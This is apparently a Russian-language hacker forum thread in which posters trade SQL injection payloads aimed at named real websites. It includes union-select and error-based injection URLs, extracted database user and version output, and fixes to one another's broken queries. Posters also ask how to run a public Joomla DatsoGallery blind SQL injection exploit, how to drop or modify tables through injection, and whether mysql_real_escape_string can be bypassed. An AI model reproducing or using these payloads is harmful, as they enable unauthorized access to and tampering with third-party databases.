http://www.pconsult.dp.ua/index.php?pn=-1+union+select+1,2,3,4,5/* user()=pconsult_user@localhost database()=pconsult_db version()=4.1.21-standard-log Делал подбор перебором, но....глухо...
Code: http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1'+union+select+null,null,null,null,null,null,null,null,null,null+from+users-- Вот тебе вариант хоть както работающего запроса, в таблице users 10 столбцов. Дальше сам. Твои ошибки - ты не закрыл кавычку рядом с ID, и в оракле комментарий начинающийся с /* должен обязательно закрываться при помощи */ поэтому следует использовать -- .
Здравствуйте, подскажите пожалуйста, как быть, у меня есть эксплоит для Joomla DatsoGallery 1.6 Blind SQL Injection, чтобы его запустить в командной строке Windows с начало прописываю путь до php, а затем через пробел, путь до експлойта, я так понял два параметра последних не обязательны, ввожу имя сайта, а он выдает ошибку 404. Подскажите что я делаю не так и как лучше этот скрипт использовать? сам он тут - securitylab.ru/poc/extra/352779.php
нащет удаления баз или таблиц, drop table? и как можно внести изменения в поле, insert into? можете навести пример или другие варианты..?
Если мускул, то никак. Нету разделения запросов. Если инъекция в селекте, то и будет выполнятся только селект.
разделение запросов может быть если делать mysql_real_connect() Если инъекция в инсерте, то можно воспользоваться конструкцией INSERT ... ON DUPLICATE KEY UPDATE и провести апдейт нужной таблицы (при определённых обстоятельствах конечно)).
сорри за тупой вопрос, тут есть скуля? PHP: $gname = $_GET['n']; try{ // 1) Get guild description $pdb = dbLayer::getCharDB(); $gname = mysql_real_escape_string($gname); // SQL injection prevention $pdb->Execute("SELECT * FROM guilds WHERE guildName='$gname'"); if( !($guild = $pdb->Fetch()) ) throw new Exception('There is no guild "'.$gname.'" in database.');
union select null from blablabla И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.
Используй ошибки для вывода данных. http://www.kdo.ru/article.asp?id=5709&cid=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
ммммм.... Обчный МССкуль=) Code: http://www.kdo.ru/article.asp?id=5709&cid=1%20OR%201=@@version А на мой вопрос в этой теме так и не ответили(((( --- Не успел отправить=)
Очень интересно.Функция mysql_real_escape_string как раз и позволяет защититься от инъекции .Если есть способ обхода, хотелось бы увидеть 2 NAT_uu ИМХО в этом скрипте инъекцию не проведёшь